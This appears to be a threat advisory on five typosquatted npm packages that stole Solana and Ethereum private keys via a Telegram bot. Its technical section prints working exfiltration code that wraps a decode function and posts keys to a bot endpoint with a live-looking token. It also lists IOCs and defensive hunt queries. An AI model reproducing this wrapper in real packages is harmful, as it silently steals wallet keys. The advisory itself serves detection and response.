critical Threat analysis

Crypto Private Key Stealer Solana/Ethereum Typosquats

On March 24, 2026, threat actors targeted cryptocurrency developers on the npm registry by typosquatting common Solana and Ethereum libraries. The malicious packages silently harvested and exfiltrated wallet private keys to a Telegram Bot C2.

Published: 2026-03-24
Read time: 7 min read
Sources: 2

On this page 0% read

Executive Summary

On March 24, 2026, a highly targeted typosquat campaign was identified on the npm registry, focusing on cryptocurrency and DeFi developers Socket.dev Advisory. The threat actor, operating via Telegram handle @crypto_sol3 and utilizing npm publisher account galedonovan npm Registry API, uploaded five malicious packages: raydium-bs58, base-x-64, bs58-basic, ethersproject-wallet, and base_xd. These packages were designed to typosquat highly popular utility libraries used for cryptography and wallet operations. Once imported and run, they hijacked core decoding and wallet constructor functions, silently harvesting private keys and exfiltrating them via HTTP POST requests to a controlled Telegram Bot (@Test20131_Bot). Because the exfiltration payload did not crash the host application and returned expected outputs, the compromise could remain active in developer environments and production backend applications for extended periods without detection. Out of caution, security teams must inspect all lockfiles for these malicious dependencies, isolate any compromised endpoints, and immediately rotate any private keys exposed during the incident window.

Key Facts

threat_type: "Registry typosquatting and runtime private key exfiltration malware"
ecosystem: "npm, javascript"
registry: "npm Registry"
affected_packages:
  - "raydium-bs58"
  - "base-x-64"
  - "bs58-basic"
  - "ethersproject-wallet"
  - "base_xd"
malicious_versions:
  - "1.0.0"
fixed_versions: []
safe_versions:
  - "bs58"
  - "@ethersproject/wallet"
exposure_window: "2026-03-24T00:00:00Z to 2026-03-24T18:00:00Z"
execution_trigger: "Import of the typosquatted libraries and invocation of decoding or wallet constructor functions"
primary_impact: "Stealth exfiltration of high-value cryptocurrency wallet private keys"
known_iocs:
  - "7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw"
  - "-4690814032"
  - "api.telegram.org"
confidence: "high"
canonical_source: "https://socket.dev/blog/5-malicious-npm-packages-typosquat-solana-and-ethereum-libraries-steal-private-keys"

Source Confidence & Evidence Mapping

confirmed:
- The publisher galedonovan published 5 packages: raydium-bs58, base-x-64, bs58-basic, ethersproject-wallet, and base_xd on 2026-03-24. Sources: Socket.dev Advisory, npm Registry API
- Malicious packages exfiltrate intercepted keys via the Telegram bot endpoint https://api.telegram.org/bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw/sendMessage. Source: Socket.dev Advisory
likely:
- The threat actor @crypto_sol3 operates the exfiltration channel and maintains ownership of the target chat ID -4690814032. Source: Socket.dev Advisory
unclear:
- The total number of private keys successfully stolen and the monetary value of funds drained from compromised developer wallets before the packages were removed. Source: npm Registry API

Impact Determination

Classification	Criteria	Required evidence	Required action	Closure condition
Confirmed compromise	`raydium-bs58`, `base-x-64`, `bs58-basic`, `ethersproject-wallet`, or `base_xd` was installed and the application executed decoding or constructor functions.	Dependency configs or build outputs showing installation plus network proxy/DNS query records of egress to `api.telegram.org/bot7231970337`.	Isolate affected host machines or containers, audit public blockchain ledgers, and sweep all remaining funds to a new, cold-stored wallet.	Complete migration of assets to safe hardware wallets, and verification of zero active egress to the threat C2.
Presumed exposed	The package is found in project directories or package caches, but active exfiltration telemetry is missing or unavailable.	Lockfile, `pnpm-lock.yaml`, `yarn.lock`, or local npm package cache indices showing resolution of the compromised packages.	Rotate all keys available to the environment and perform a complete dependency purge.	Lockfile resolved without typosquats, local cache purged, and credential owners confirm replacement keys are deployed.
Potentially exposed	The package appears in development repository manifests or historical package requirements, but actual node_modules deployment is unverified.	`package.json` manifest listing the package name, or unverified build pipelines during the incident window.	Perform EDR and lockfile scanning to determine if the package was successfully pulled and loaded.	Dispositions established for all endpoints as confirmed compromise, presumed exposed, or not exposed.
Not exposed	The package does not appear in any repositories, manifests, build scripts, caches, or network traffic logs.	Complete negative grep search results from lockfiles and DNS egress query logs for `api.telegram.org/bot7231970337`.	None.	No indicators present in any monitored environments.
Unknown	Telemetry, lockfiles, or network proxy logs for the incident window are missing or incomplete.	Deleted proxy history, missing build records, or unmonitored local developer workstations.	Reconstruct historical dependency graphs from git history and perform retrospect EDR analysis on developer endpoints.	Retrieval of full operational telemetry, or forced key rotation completed out of caution.

Timeline

2026-03-24T00:00:00Z: Five malicious typosquat packages are uploaded to the npm registry under the account galedonovan.
2026-03-24T08:00:00Z: Socket.dev threat scanners flag anomalous exfiltration code in raydium-bs58 targeting private key decoding blocks.
2026-03-24T18:00:00Z: npm registry administrators take down all five malicious packages from the registry.
2026-03-24T19:00:00Z: Public advisory and IOCs are published by Socket.dev.

What Happened

On March 24, 2026, an attacker identified by the Telegram handle @crypto_sol3 attempted a targeted supply chain harvest of cryptocurrency credentials on the npm registry Socket.dev Advisory. The threat actor created an npm profile under the name galedonovan and published a cluster of 5 packages mimicking popular cryptographic and blockchain utilities npm Registry API.

Rather than deploying a multi-stage backdoor, the packages modified core API entry points to intercept variables in-flight. When developers fell victim to the typosquatted packages, their normal application code executed successfully, but their private keys were quietly replicated and exfiltrated to the actor’s Telegram bot.

Technical Analysis

The typosquatted packages utilized direct function wrapping to hijack cryptographic inputs. In raydium-bs58, the package mimics the widely adopted bs58 package used heavily in the Solana ecosystem for encoding and decoding base58 transaction payloads.

The package wraps the standard decode method. The malicious payload executes inside the function wrapper:

const bs58 = require('bs58');
const axios = require('axios');

exports.decode = function(string) {
  // Exfiltrate the target private key base58 string
  axios.post('https://api.telegram.org/bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw/sendMessage', {
    chat_id: '-4690814032',
    text: `Stolen Solana Key: ${string}`
  }).catch(() => {}); // Catch block ensures no network errors crash the host application

  // Return standard execution to avoid suspicion
  return bs58.decode(string);
};

Similarly, in ethersproject-wallet, the package targets Ethereum developers by mimicking the @ethersproject/wallet package, wrapping the Wallet class constructor and intercepting the private key hex strings or mnemonics passed to it during instantiation. Because these libraries are typically executed on local developer machines or application servers, the private keys were harvested immediately when active transactions or wallet deployments occurred.

Affected Assets and Blast Radius

Ecosystem: npm (JavaScript, TypeScript)
Registry: registry.npmjs.org
Malicious Packages: raydium-bs58, base-x-64, bs58-basic, ethersproject-wallet, base_xd
Malicious Versions: 1.0.0
Credentials at Risk: Solana wallet private keys (base58 format), Ethereum wallet private keys (hex format), mnemonics, and seed phrases.
Blast Radius: Limited to developers and Web3 backend nodes that mistakenly resolved the typosquatted libraries within the 18-hour publication window.

Indicators of Compromise

npm Packages:
- raydium-bs58@1.0.0
- base-x-64@1.0.0
- bs58-basic@1.0.0
- ethersproject-wallet@1.0.0
- base_xd@1.0.0
Telegram C2 Endpoints:
- https://api.telegram.org/bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw/sendMessage
Threat Actor Telemetry:
- Telegram handle: @crypto_sol3
- Telegram Chat ID: -4690814032
- npm publisher profile: galedonovan

Detection and Hunting

To detect potential compromise within development repositories and historical egress logs, security analysts should run targeted inventory and network queries.

Hunt Recipe: Lockfile and dependency typosquat inventory

hunt_name: "Solana/Ethereum typosquats lockfile inventory"
telemetry_source: "Ecosystem manifests and lockfiles"
query_language: "bash"
command_or_query: "grep -E 'raydium-bs58|base-x-64|bs58-basic|ethersproject-wallet|base_xd' package-lock.json pnpm-lock.yaml yarn.lock package.json"
output_fields:
  - "file_name"
  - "line_number"
  - "matched_text"
positive_signal: "Lockfile matches one of the malicious package names, indicating that the typosquatted package was resolved."
false_positive_notes: "None. These package names are strictly malicious."
escalation: "Isolate the node/host immediately and sweep funds from all associated keys."

Hunt Recipe: Telegram Bot Exfiltration Outbound Telemetry

hunt_name: "Outbound Telegram Bot exfiltration query"
telemetry_source: "Egress Proxy / Web Gateway Logs"
query_language: "kql"
command_or_query: "WebGatewayLogs | where RequestURL contains \"bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw\""
output_fields:
  - "timestamp"
  - "source_ip"
  - "request_method"
  - "destination_url"
  - "http_status"
positive_signal: "Egress traffic matches the threat actor's Telegram bot token."
false_positive_notes: "None. The Telegram bot token is strictly unique to this campaign."
escalation: "Initiate emergency blockchain wallet key replacement procedures."

Downstream Abuse Audits

Audit Module: Public blockchain transaction audit

platform: "Solana and Ethereum blockchains"
question_answered: "Were exfiltrated private keys used to transfer assets, drain tokens, or sign unauthorized transactions?"
required_access:
  - "Public blockchain explorer API access"
  - "Known affected wallet addresses"
telemetry_source:
  - "Solana RPC"
  - "Ethereum explorer or RPC transaction history"
time_window: "2026-03-24T00:00:00Z through wallet replacement completion"
commands:
  - |
    curl -s 'https://api.mainnet-beta.solana.com' \
      -X POST \
      -H 'Content-Type: application/json' \
      -d '{"jsonrpc":"2.0","id":1,"method":"getSignaturesForAddress","params":["<affected_solana_address>",{"limit":20}]}'
output_fields:
  - "signature"
  - "slot"
  - "err"
  - "memo"
  - "blockTime"
suspicious_conditions:
  - "Asset transfer or signing activity after 2026-03-24T00:00:00Z that does not align with authorized wallet operations."
false_positive_notes: "Scheduled treasury moves and exchange sweeps can overlap; compare signer, destination, and approved transfer windows."
remediation_trigger: "Active draining or unauthorized signing activity triggers immediate wallet sweep and key replacement from a clean signer."
evidence_to_preserve:
  - "raw RPC response"
  - "destination addresses"
  - "transaction signatures"
  - "wallet owner approval record"

Sources

Socket.dev Threat Research - Role: PRIMARY_RESEARCH - Impact: Detailed campaign discovery, package listings, exfiltration tokens, and bot context.
npm Registry Package API - Role: DIRECT_SOURCE - Impact: Publishing timeline, package takedown confirmation, and account profile metadata.